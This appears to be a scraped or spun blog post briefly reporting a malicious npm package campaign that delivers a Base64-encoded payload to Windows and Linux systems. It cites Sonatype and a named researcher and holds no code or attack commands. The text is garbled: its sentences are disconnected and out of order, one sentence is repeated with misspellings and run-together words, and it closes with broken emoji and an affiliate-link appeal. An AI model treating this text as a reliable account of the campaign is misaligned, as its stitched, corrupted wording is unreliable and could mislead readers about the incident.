This carefully orchestrated attack serves as a stark reminder of the ever-evolving complexity of modern threat actors in the open-source ecosystem.
Researchers have discovered a new campaign aimed at the npm ecosystem that leverages a unique execution chain to deliver an unknown payload to targeted systems.
The command-and-response process returns a Base64 encoded string that is immediately executed but only if that string is longer than 100 characters.
These packages target the Windows operating system and are identical with regards to their versioning, security researcher and journalist Ax Sharma said.
Also discovered by Sonatype is a package referred to as libiobe that’s capable of targeting both Windows and Linux operating systems.
Cybersecurity researchers have found a new ongoing campaign aimed against the npm community that leverades a uniqueexecution chain to delivery anunknown payload totarget systems.
๐ Feeling the vibes?
Keep the good energy going by checking out my Amazon affiliate link for some cool finds! ๐๏ธ
If not, consider contributing to my caffeine supply at Buy Me a Coffee โ๏ธ.
Your clicks = cosmic support for more awesome content! ๐๐
Leave a Reply